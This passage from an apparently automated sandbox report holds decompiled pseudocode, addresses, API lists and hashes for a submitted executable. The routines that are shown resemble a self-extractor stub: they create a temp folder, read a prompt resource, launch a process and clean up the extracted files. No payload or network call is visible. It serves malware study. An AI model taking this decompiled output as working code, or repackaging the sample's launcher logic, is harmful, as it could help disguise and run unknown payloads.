                                                                        					} else {
                                                                        						_push(0x1f);
                                                                        						L003D6FF4();
                                                                        						L13:
                                                                        						_t68 =  *0x3d88b0 - _t58; // 0x2
                                                                        						if(_t68 == 0) {
                                                                        							_push(0x3d10b4);
                                                                        							_push(0x3d10ac);
                                                                        							L003D7202();
                                                                        							 *0x3d88b0 = 2;
                                                                        						}
                                                                        						if(_t53 == 0) {
                                                                        							 *0x3d88ac = 0;
                                                                        						}
                                                                        						_t71 =  *0x3d88b4;
                                                                        						if( *0x3d88b4 != 0 && E003D7060(_t71, 0x3d88b4) != 0) {
                                                                        							_t60 =  *0x3d88b4; // 0x0
                                                                        							 *0x3da288(0, 2, 0);
                                                                        							 *_t60();
                                                                        						}
                                                                        						_t25 = __imp___acmdln; // 0x76725b9c
                                                                        						_t59 =  *_t25;
                                                                        						 *(_t62 - 0x1c) = _t59;
                                                                        						_t54 =  *(_t62 - 0x20);
                                                                        						while(1) {
                                                                        							_t41 =  *_t59;
                                                                        							if(_t41 > 0x20) {
                                                                        								goto L32;
                                                                        							}
                                                                        							if(_t41 != 0) {
                                                                        								if(_t54 != 0) {
                                                                        									goto L32;
                                                                        								} else {
                                                                        									while(_t41 != 0 && _t41 <= 0x20) {
                                                                        										_t59 = _t59 + 1;
                                                                        										 *(_t62 - 0x1c) = _t59;
                                                                        										_t41 =  *_t59;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                        							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                        								_t29 = 0xa;
                                                                        							} else {
                                                                        								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                        							}
                                                                        							_push(_t29);
                                                                        							_t30 = E003D2BFB(0x3d0000, 0, _t59); // executed
                                                                        							 *0x3d81e0 = _t30;
                                                                        							__eflags =  *0x3d81f8;
                                                                        							if( *0x3d81f8 == 0) {
                                                                        								exit(_t30); // executed
                                                                        								goto L32;
                                                                        							}
                                                                        							__eflags =  *0x3d81e4;
                                                                        							if( *0x3d81e4 == 0) {
                                                                        								__imp___cexit();
                                                                        								_t30 =  *0x3d81e0; // 0x0
                                                                        							}
                                                                        							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                        							goto L40;
                                                                        							L32:
                                                                        							__eflags = _t41 - 0x22;
                                                                        							if(_t41 == 0x22) {
                                                                        								__eflags = _t54;
                                                                        								_t15 = _t54 == 0;
                                                                        								__eflags = _t15;
                                                                        								_t54 = 0 | _t15;
                                                                        								 *(_t62 - 0x20) = _t54;
                                                                        							}
                                                                        							_t26 = _t41 & 0x000000ff;
                                                                        							__imp___ismbblead(_t26);
                                                                        							__eflags = _t26;
                                                                        							if(_t26 != 0) {
                                                                        								_t59 = _t59 + 1;
                                                                        								__eflags = _t59;
                                                                        								 *(_t62 - 0x1c) = _t59;
                                                                        							}
                                                                        							_t59 = _t59 + 1;
                                                                        							 *(_t62 - 0x1c) = _t59;
                                                                        						}
                                                                        					}
                                                                        					L40:
                                                                        					return E003D724D(_t30);
                                                                        				}
                                                                        				_t58 = 1;
                                                                        				__eflags = 1;
                                                                        				goto L7;
                                                                        			}


















                                                                        0x003d6a60
                                                                        0x003d6a6a
                                                                        0x003d6a6c
                                                                        0x003d6a71
                                                                        0x003d6a78
                                                                        0x003d6a7f
                                                                        0x003d6a85
                                                                        0x003d6a8e
                                                                        0x003d6a91
                                                                        0x003d6a93
                                                                        0x003d6a9c
                                                                        0x003d6aa2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d6aa6
                                                                        0x003d6ab4
                                                                        0x00000000
                                                                        0x003d6aa8
                                                                        0x003d6aaa
                                                                        0x003d6aab
                                                                        0x003d6aab
                                                                        0x003d6abf
                                                                        0x003d6abf
                                                                        0x003d6ac5
                                                                        0x003d6ad1
                                                                        0x003d6ad7
                                                                        0x003d6b05
                                                                        0x00000000
                                                                        0x003d6ad9
                                                                        0x003d6ad9
                                                                        0x003d6ae9
                                                                        0x003d6af0
                                                                        0x003d6af2
                                                                        0x00000000
                                                                        0x003d6af4
                                                                        0x003d6af4
                                                                        0x003d6afb
                                                                        0x003d6afb
                                                                        0x003d6af2
                                                                        0x003d6ac7
                                                                        0x003d6ac7
                                                                        0x003d6ac9
                                                                        0x003d6b0b
                                                                        0x003d6b0b
                                                                        0x003d6b11
                                                                        0x003d6b13
                                                                        0x003d6b18
                                                                        0x003d6b1d
                                                                        0x003d6b24
                                                                        0x003d6b24
                                                                        0x003d6b30
                                                                        0x003d6b39
                                                                        0x003d6b39
                                                                        0x003d6b3b
                                                                        0x003d6b42
                                                                        0x003d6b57
                                                                        0x003d6b5f
                                                                        0x003d6b65
                                                                        0x003d6b65
                                                                        0x003d6b67
                                                                        0x003d6b6c
                                                                        0x003d6b6e
                                                                        0x003d6b71
                                                                        0x003d6b74
                                                                        0x003d6b74
                                                                        0x003d6b79
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d6b7d
                                                                        0x003d6b81
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d6b83
                                                                        0x003d6b8c
                                                                        0x003d6b8d
                                                                        0x003d6b90
                                                                        0x003d6b90
                                                                        0x003d6b83
                                                                        0x003d6b81
                                                                        0x003d6b94
                                                                        0x003d6b98
                                                                        0x003d6ba2
                                                                        0x003d6b9a
                                                                        0x003d6b9a
                                                                        0x003d6b9a
                                                                        0x003d6ba3
                                                                        0x003d6bab
                                                                        0x003d6bb0
                                                                        0x003d6bb5
                                                                        0x003d6bbc
                                                                        0x003d6bbf
                                                                        0x00000000
                                                                        0x003d6bbf
                                                                        0x003d6c1e
                                                                        0x003d6c25
                                                                        0x003d6c27
                                                                        0x003d6c2d
                                                                        0x003d6c2d
                                                                        0x003d6c32
                                                                        0x00000000
                                                                        0x003d6bc5
                                                                        0x003d6bc5
                                                                        0x003d6bc8
                                                                        0x003d6bcc
                                                                        0x003d6bce
                                                                        0x003d6bce
                                                                        0x003d6bd1
                                                                        0x003d6bd3
                                                                        0x003d6bd3
                                                                        0x003d6bd6
                                                                        0x003d6bda
                                                                        0x003d6be1
                                                                        0x003d6be3
                                                                        0x003d6be5
                                                                        0x003d6be5
                                                                        0x003d6be6
                                                                        0x003d6be6
                                                                        0x003d6be9
                                                                        0x003d6bea
                                                                        0x003d6bea
                                                                        0x003d6b74
                                                                        0x003d6c39
                                                                        0x003d6c3e
                                                                        0x003d6c3e
                                                                        0x003d6abe
                                                                        0x003d6abe
                                                                        0x00000000

                                                                        APIs
                                                                          • Part of subcall function 003D7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 003D7182
                                                                          • Part of subcall function 003D7155: GetCurrentProcessId.KERNEL32 ref: 003D7191
                                                                          • Part of subcall function 003D7155: GetCurrentThreadId.KERNEL32 ref: 003D719A
                                                                          • Part of subcall function 003D7155: GetTickCount.KERNEL32 ref: 003D71A3
                                                                          • Part of subcall function 003D7155: QueryPerformanceCounter.KERNEL32(?), ref: 003D71B8
                                                                        • GetStartupInfoW.KERNEL32(?,003D72B8,00000058), ref: 003D6A7F
                                                                        • Sleep.KERNEL32(000003E8), ref: 003D6AB4
                                                                        • _amsg_exit.MSVCRT ref: 003D6AC9
                                                                        • _initterm.MSVCRT ref: 003D6B1D
                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 003D6B49
                                                                        • exit.KERNELBASE ref: 003D6BBF
                                                                        • _ismbblead.MSVCRT ref: 003D6BDA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                        • String ID:
                                                                        • API String ID: 836923961-0
                                                                        • Opcode ID: 90abef83da5720d0132e3d1e85650cb987141b3a383e64ad997d4c1c8cec5d07
                                                                        • Instruction ID: 23e5585113e4e6c3dbbb103b7d2741f1421091069ba5e8eb7052765ea1df6969
                                                                        • Opcode Fuzzy Hash: 90abef83da5720d0132e3d1e85650cb987141b3a383e64ad997d4c1c8cec5d07
                                                                        • Instruction Fuzzy Hash: 6C4112739497649FDB239B6AFD067AA77E8FB44720F25001BE861E7390CB745840CB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 587 3d58c8-3d58d5 588 3d58d8-3d58dd 587->588 588->588 589 3d58df-3d58f1 LocalAlloc 588->589 590 3d5919-3d5959 call 3d1680 call 3d658a CreateFileA LocalFree 589->590 591 3d58f3-3d5901 call 3d44b9 589->591 595 3d5906-3d5910 call 3d6285 590->595 601 3d595b-3d596c CloseHandle GetFileAttributesA 590->601 591->595 600 3d5912-3d5918 595->600 601->595 602 3d596e-3d5970 601->602 602->595 603 3d5972-3d597b 602->603 603->600
                                                                        C-Code - Quality: 95%
                                                                        			E003D58C8(intOrPtr* __ecx) {
                                                                        				void* _v8;
                                                                        				intOrPtr _t6;
                                                                        				void* _t10;
                                                                        				void* _t12;
                                                                        				void* _t14;
                                                                        				signed char _t16;
                                                                        				void* _t20;
                                                                        				void* _t23;
                                                                        				intOrPtr* _t27;
                                                                        				CHAR* _t33;
                                                                        
                                                                        				_push(__ecx);
                                                                        				_t33 = __ecx;
                                                                        				_t27 = __ecx;
                                                                        				_t23 = __ecx + 1;
                                                                        				do {
                                                                        					_t6 =  *_t27;
                                                                        					_t27 = _t27 + 1;
                                                                        				} while (_t6 != 0);
                                                                        				_t36 = _t27 - _t23 + 0x14;
                                                                        				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                        				if(_t20 != 0) {
                                                                        					E003D1680(_t20, _t36, _t33);
                                                                        					E003D658A(_t20, _t36, "TMP4351$.TMP");
                                                                        					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                        					_v8 = _t10;
                                                                        					LocalFree(_t20);
                                                                        					_t12 = _v8;
                                                                        					if(_t12 == 0xffffffff) {
                                                                        						goto L4;
                                                                        					} else {
                                                                        						CloseHandle(_t12);
                                                                        						_t16 = GetFileAttributesA(_t33); // executed
                                                                        						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                        							goto L4;
                                                                        						} else {
                                                                        							 *0x3d9124 = 0;
                                                                        							_t14 = 1;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					E003D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        					L4:
                                                                        					 *0x3d9124 = E003D6285();
                                                                        					_t14 = 0;
                                                                        				}
                                                                        				return _t14;
                                                                        			}













                                                                        0x003d58cd
                                                                        0x003d58d1
                                                                        0x003d58d3
                                                                        0x003d58d5
                                                                        0x003d58d8
                                                                        0x003d58d8
                                                                        0x003d58da
                                                                        0x003d58db
                                                                        0x003d58e1
                                                                        0x003d58ed
                                                                        0x003d58f1
                                                                        0x003d591e
                                                                        0x003d592c
                                                                        0x003d5943
                                                                        0x003d594a
                                                                        0x003d594d
                                                                        0x003d5953
                                                                        0x003d5959
                                                                        0x00000000
                                                                        0x003d595b
                                                                        0x003d595c
                                                                        0x003d5963
                                                                        0x003d596c
                                                                        0x00000000
                                                                        0x003d5972
                                                                        0x003d5974
                                                                        0x003d597a
                                                                        0x003d597a
                                                                        0x003d596c
                                                                        0x003d58f3
                                                                        0x003d5901
                                                                        0x003d5906
                                                                        0x003d590b
                                                                        0x003d5910
                                                                        0x003d5910
                                                                        0x003d5918

                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,003D5534,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003D58E7
                                                                        • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,003D5534,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003D5943
                                                                        • LocalFree.KERNEL32(00000000,?,003D5534,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003D594D
                                                                        • CloseHandle.KERNEL32(00000000,?,003D5534,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003D595C
                                                                        • GetFileAttributesA.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,003D5534,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003D5963
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
                                                                        • API String ID: 747627703-3788082193
                                                                        • Opcode ID: 3e00bda287b35912ed71af9d36709761aadec67a5057c092d36dc8a92febeba4
                                                                        • Instruction ID: 747b23929e04c02dc98c836dc86a016c5e656653c3bb61662c00446acf1fc385
                                                                        • Opcode Fuzzy Hash: 3e00bda287b35912ed71af9d36709761aadec67a5057c092d36dc8a92febeba4
                                                                        • Instruction Fuzzy Hash: 1311D0736016206BC7265F7ABC4EB9B7B9DEF46360F104617B51AD6391CB70980586A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 631 3d3fef-3d4010 632 3d410a-3d411a call 3d6ce0 631->632 633 3d4016-3d403b CreateProcessA 631->633 634 3d40c4-3d4101 call 3d6285 GetLastError FormatMessageA call 3d44b9 633->634 635 3d4041-3d406e WaitForSingleObject GetExitCodeProcess 633->635 650 3d4106 634->650 637 3d4091 call 3d411b 635->637 638 3d4070-3d4077 635->638 645 3d4096-3d40b8 CloseHandle * 2 637->645 638->637 641 3d4079-3d407b 638->641 641->637 644 3d407d-3d4089 641->644 644->637 647 3d408b 644->647 648 3d4108 645->648 649 3d40ba-3d40c0 645->649 647->637 648->632 649->648 651 3d40c2 649->651 650->648 651->650
                                                                        C-Code - Quality: 84%
                                                                        			E003D3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                        				signed int _v8;
                                                                        				char _v524;
                                                                        				long _v528;
                                                                        				struct _PROCESS_INFORMATION _v544;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t20;
                                                                        				void* _t22;
                                                                        				int _t25;
                                                                        				intOrPtr* _t39;
                                                                        				signed int _t44;
                                                                        				void* _t49;
                                                                        				signed int _t50;
                                                                        				intOrPtr _t53;
                                                                        
                                                                        				_t45 = __edx;
                                                                        				_t20 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t20 ^ _t50;
                                                                        				_t39 = __ecx;
                                                                        				_t49 = 1;
                                                                        				_t22 = 0;
                                                                        				if(__ecx == 0) {
                                                                        					L13:
                                                                        					return E003D6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                        				}
                                                                        				asm("stosd");
                                                                        				asm("stosd");
                                                                        				asm("stosd");
                                                                        				asm("stosd");
                                                                        				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                        				if(_t25 == 0) {
                                                                        					 *0x3d9124 = E003D6285();
                                                                        					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                                                                        					_t45 = 0x4c4;
                                                                        					E003D44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                                                                        					L11:
                                                                        					_t49 = 0;
                                                                        					L12:
                                                                        					_t22 = _t49;
                                                                        					goto L13;
                                                                        				}
                                                                        				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                        				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                        				_t44 = _v528;
                                                                        				_t53 =  *0x3d8a28; // 0x0
                                                                        				if(_t53 == 0) {
                                                                        					_t34 =  *0x3d9a2c; // 0x0
                                                                        					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                        						_t34 = _t44 & 0xff000000;
                                                                        						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                        							 *0x3d9a2c = _t44;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				E003D411B(_t34, _t44);
                                                                        				CloseHandle(_v544.hThread);
                                                                        				CloseHandle(_v544);
                                                                        				if(( *0x3d9a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                        					goto L12;
                                                                        				} else {
                                                                        					goto L11;
                                                                        				}
                                                                        			}


















                                                                        0x003d3fef
                                                                        0x003d3ffa
                                                                        0x003d4001
                                                                        0x003d4008
                                                                        0x003d400a
                                                                        0x003d400b
                                                                        0x003d4010
                                                                        0x003d410a
                                                                        0x003d411a
                                                                        0x003d411a
                                                                        0x003d401c
                                                                        0x003d401d
                                                                        0x003d401e
                                                                        0x003d401f
                                                                        0x003d4033
                                                                        0x003d403b
                                                                        0x003d40ca
                                                                        0x003d40e9
                                                                        0x003d40f8
                                                                        0x003d4101
                                                                        0x003d4106
                                                                        0x003d4106
                                                                        0x003d4108
                                                                        0x003d4108
                                                                        0x00000000
                                                                        0x003d4108
                                                                        0x003d4049
                                                                        0x003d405c
                                                                        0x003d4062
                                                                        0x003d4068
                                                                        0x003d406e
                                                                        0x003d4070
                                                                        0x003d4077
                                                                        0x003d407f
                                                                        0x003d4089
                                                                        0x003d408b
                                                                        0x003d408b
                                                                        0x003d4089
                                                                        0x003d4077
                                                                        0x003d4091
                                                                        0x003d409c
                                                                        0x003d40a8
                                                                        0x003d40b8
                                                                        0x00000000
                                                                        0x003d40c2
                                                                        0x00000000
                                                                        0x003d40c2

                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE ref: 003D4033
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 003D4049
                                                                        • GetExitCodeProcess.KERNELBASE ref: 003D405C
                                                                        • CloseHandle.KERNEL32(?), ref: 003D409C
                                                                        • CloseHandle.KERNEL32(?), ref: 003D40A8
                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 003D40DC
                                                                        • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 003D40E9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                        • String ID:
                                                                        • API String ID: 3183975587-0
                                                                        • Opcode ID: 007710367998de4b3b1279225c007154dcac2d74c8506d67d22cb3d53be0d83e
                                                                        • Instruction ID: 38bff6f28d49fc6d7661bcefe2d264421629164b21332b04497bd177de15a8b1
                                                                        • Opcode Fuzzy Hash: 007710367998de4b3b1279225c007154dcac2d74c8506d67d22cb3d53be0d83e
                                                                        • Instruction Fuzzy Hash: 1F31B472642618ABEB229F65FC49FABB77CEB94700F1001ABF545D6261C6308D85CB11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 652 3d51e5-3d520b call 3d468f LocalAlloc 655 3d522d-3d523c call 3d468f 652->655 656 3d520d-3d5228 call 3d44b9 call 3d6285 652->656 662 3d523e-3d5260 call 3d44b9 LocalFree 655->662 663 3d5262-3d5270 lstrcmpA 655->663 670 3d52b0 656->670 662->670 666 3d527e-3d529c call 3d44b9 LocalFree 663->666 667 3d5272-3d5273 LocalFree 663->667 674 3d529e-3d52a4 666->674 675 3d52a6 666->675 668 3d5279-3d527c 667->668 672 3d52b2-3d52b5 668->672 670->672 674->668 675->670
                                                                        C-Code - Quality: 100%
                                                                        			E003D51E5(void* __eflags) {
                                                                        				int _t5;
                                                                        				void* _t6;
                                                                        				void* _t28;
                                                                        
                                                                        				_t1 = E003D468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                        				_t28 = LocalAlloc(0x40, _t1);
                                                                        				if(_t28 != 0) {
                                                                        					if(E003D468F("UPROMPT", _t28, _t29) != 0) {
                                                                        						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                        						if(_t5 != 0) {
                                                                        							_t6 = E003D44B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                        							LocalFree(_t28);
                                                                        							if(_t6 != 6) {
                                                                        								 *0x3d9124 = 0x800704c7;
                                                                        								L10:
                                                                        								return 0;
                                                                        							}
                                                                        							 *0x3d9124 = 0;
                                                                        							L6:
                                                                        							return 1;
                                                                        						}
                                                                        						LocalFree(_t28);
                                                                        						goto L6;
                                                                        					}
                                                                        					E003D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        					LocalFree(_t28);
                                                                        					 *0x3d9124 = 0x80070714;
                                                                        					goto L10;
                                                                        				}
                                                                        				E003D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        				 *0x3d9124 = E003D6285();
                                                                        				goto L10;
                                                                        			}






                                                                        0x003d51fb
                                                                        0x003d5207
                                                                        0x003d520b
                                                                        0x003d523c
                                                                        0x003d5268
                                                                        0x003d5270
                                                                        0x003d528b
                                                                        0x003d5293
                                                                        0x003d529c
                                                                        0x003d52a6
                                                                        0x003d52b0
                                                                        0x00000000
                                                                        0x003d52b0
                                                                        0x003d529e
                                                                        0x003d5279
                                                                        0x00000000
                                                                        0x003d527b
                                                                        0x003d5273
                                                                        0x00000000
                                                                        0x003d5273
                                                                        0x003d524a
                                                                        0x003d5250
                                                                        0x003d5256
                                                                        0x00000000
                                                                        0x003d5256
                                                                        0x003d5219
                                                                        0x003d5223
                                                                        0x00000000

                                                                        APIs
                                                                          • Part of subcall function 003D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003D46A0
                                                                          • Part of subcall function 003D468F: SizeofResource.KERNEL32(00000000,00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46A9
                                                                          • Part of subcall function 003D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003D46C3
                                                                          • Part of subcall function 003D468F: LoadResource.KERNEL32(00000000,00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46CC
                                                                          • Part of subcall function 003D468F: LockResource.KERNEL32(00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46D3
                                                                          • Part of subcall function 003D468F: memcpy_s.MSVCRT ref: 003D46E5
                                                                          • Part of subcall function 003D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46EF
                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,003D2F4D,?,00000002,00000000), ref: 003D5201
                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 003D5250
                                                                          • Part of subcall function 003D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003D4518
                                                                          • Part of subcall function 003D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 003D4554
                                                                          • Part of subcall function 003D6285: GetLastError.KERNEL32(003D5BBC), ref: 003D6285
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                        • String ID: <None>$UPROMPT
                                                                        • API String ID: 957408736-2980973527
                                                                        • Opcode ID: 543654f6f59e2ddda130ad9fc88743b554e297defc03b2ce5be17661e5b3bddc
                                                                        • Instruction ID: 2d439bda4b814fbf92bb2db79ed389096e89dd703affd58bac59d5ade1fdd7c9
                                                                        • Opcode Fuzzy Hash: 543654f6f59e2ddda130ad9fc88743b554e297defc03b2ce5be17661e5b3bddc
                                                                        • Instruction Fuzzy Hash: 0211C8772026017BD3176BB1BD46F3B72ADEB89350F11482BF642D9790DA798C054124
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 74%
                                                                        			E003D52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				signed int _t9;
                                                                        				signed int _t11;
                                                                        				void* _t21;
                                                                        				void* _t29;
                                                                        				CHAR** _t31;
                                                                        				void* _t32;
                                                                        				signed int _t33;
                                                                        
                                                                        				_t28 = __edi;
                                                                        				_t22 = __ecx;
                                                                        				_t21 = __ebx;
                                                                        				_t9 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t9 ^ _t33;
                                                                        				_push(__esi);
                                                                        				_t31 =  *0x3d91e0; // 0x2b58300
                                                                        				if(_t31 != 0) {
                                                                        					_push(__edi);
                                                                        					do {
                                                                        						_t29 = _t31;
                                                                        						if( *0x3d8a24 == 0 &&  *0x3d9a30 == 0) {
                                                                        							SetFileAttributesA( *_t31, 0x80); // executed
                                                                        							DeleteFileA( *_t31); // executed
                                                                        						}
                                                                        						_t31 = _t31[1];
                                                                        						LocalFree( *_t29);
                                                                        						LocalFree(_t29);
                                                                        					} while (_t31 != 0);
                                                                        					_pop(_t28);
                                                                        				}
                                                                        				_t11 =  *0x3d8a20; // 0x0
                                                                        				_pop(_t32);
                                                                        				if(_t11 != 0 &&  *0x3d8a24 == 0 &&  *0x3d9a30 == 0) {
                                                                        					_push(_t22);
                                                                        					E003D1781( &_v268, 0x104, _t22, "C:\Users\FRONTD~1\AppData\Local\Temp\IXP000.TMP\");
                                                                        					if(( *0x3d9a34 & 0x00000020) != 0) {
                                                                        						E003D65E8( &_v268);
                                                                        					}
                                                                        					SetCurrentDirectoryA(".."); // executed
                                                                        					_t22 =  &_v268;
                                                                        					E003D2390( &_v268);
                                                                        					_t11 =  *0x3d8a20; // 0x0
                                                                        				}
                                                                        				if( *0x3d9a40 != 1 && _t11 != 0) {
                                                                        					_t11 = E003D1FE1(_t22); // executed
                                                                        				}
                                                                        				 *0x3d8a20 =  *0x3d8a20 & 0x00000000;
                                                                        				return E003D6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                        			}












                                                                        0x003d52b6
                                                                        0x003d52b6
                                                                        0x003d52b6
                                                                        0x003d52c1
                                                                        0x003d52c8
                                                                        0x003d52cb
                                                                        0x003d52cc
                                                                        0x003d52d4
                                                                        0x003d52d6
                                                                        0x003d52d7
                                                                        0x003d52de
                                                                        0x003d52e0
                                                                        0x003d52f2
                                                                        0x003d52fa
                                                                        0x003d52fa
                                                                        0x003d5302
                                                                        0x003d5305
                                                                        0x003d530c
                                                                        0x003d5312
